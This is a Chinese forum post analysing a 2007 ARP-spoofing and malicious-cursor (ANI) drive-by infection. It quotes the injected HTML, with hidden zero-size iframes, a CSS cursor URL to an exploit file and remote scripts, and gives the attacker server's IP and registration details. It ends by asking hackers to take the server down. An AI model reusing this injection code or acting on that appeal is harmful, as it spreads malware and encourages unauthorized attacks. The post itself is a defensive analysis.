[原创] 发现 Hack.SuspiciousAni 病毒内的秘密

 已经连续一星期了，我机子装的瑞星不断的截获这种Hack.SuspiciousAni 光标病毒。如图：

 

   起初我还一位登上了一个带病毒的网站呢，清除就清除吧。可后来发现不是那么回事。只要一打开网站，必然会弹出发现病毒的提示。

   去百度上搜了一下，才基本上知道原因。而这个原因起初我也怀疑过。局域网内有人种了这种病毒，病毒使用ARP截获并转发，将局域网内所有要打开页面的网址先转发到一个病毒作者指定的网站上，再跳转到真正所要进入的网站。跳转只是一瞬间。

   去微软找了一下这个漏洞的补丁，我的机子是win2003 SP2

找到了补丁的名称为： WindowsServer2003-KB925902-x86-CHS 。在微软的网站上发现这个漏洞的时间是 2007年4月3日。

这个漏洞的补丁当时我就已经打过，并且我的机子已经SP2了，按理说这种事情不应该再发生了。不知道为何，遇到利用这个漏洞的病毒，竟然无法防御。我下载后又打了一遍，情况依然……

    接下来的事情就比较奇妙了。在所转到的那个站点的页面内，很容易的就找到了跳转到的地址。[url]http://1111.850860.cn/pic.htm[/url] 顺着目录找下去，打开源码来看。
<iframe src=http://1111.850860.cn/pic.htm width=0 height=0></iframe>

<HTML>
<BODY style='CURSOR: url([url]http://www.6658588.cn/ad.jpg[/url])'></BODY>
</HTML>
<script src=http://www.6658588.cn/0614.js></script>
<iframe src="http://www.6658588.cn/1/123.htm" width="0" height="0" border="0"></iframe>
<script language="javascript" src=http://ww3.tongji123.com/t1.aspx?id=38251079></script>

会做网页的人应该都能读懂上面所写的意思。

首先这个页面嵌套了一个地址为[url]http://1111.850860.cn/pic.htm[/url]的宽高都为0的伪隐藏框架，这个页面里的病毒数量可想而知，只要作者喜欢，可以放成千上万个。然后在BODY主题部分加入了一段CSS样式，内容的意思为：让光标按照url([url]http://www.6658588.cn/ad.jpg[/url])所链接的样子来显示。而这个JPG图片呢，也正是一个病毒，这段代码也正是利用微软公布的这个漏洞。然后下面又是一个隐藏框架，链接到的地址为[url]http://www.6658588.cn/1/123.htm[/url]这个页面，里面也可以放入大量的病毒。更可笑的是，在最后一段代码上，作者还加了一个统计123网的统计链接，用来统计有多少人访问过这个页面。ID为38251079 链接地址是：[url]http://ww3.tongji123.com/t1.aspx?id=38251079[/url]。

 

PING了一下上面的两个地址后，得到的IP是同一个服务器IP:60.190.114.84 所在的地址是：浙江省温州市电信

查了一下WHOIS，得到这两个域名都是被同一家公司：北京万网志成科技有限公司 注册的，域名是由中国万网提供的。

公司邮箱为：[email]6658588@163.com[/email]

域名注册于2007年6月8日

 

我的调查只能到此结束了，又是一个典型的中国人害中国人的骇客事件。我想，与我有同样经历的朋友们，也感受到了这恶心的病毒和漏洞带来的麻烦。我只是希望，中国的骇客不要再害自己人了。。。也希望看到我这篇文章的黑客朋友，可以帮忙干掉这台害人的服务器。真正的解决办法，可能也就是再装一个ARP的防火墙，或者打一个微软的漏洞。

 

希望没有装防火墙的朋友们，还是买一款中国的好防火墙来抵御一下来自国内外骇客的无耻攻击吧。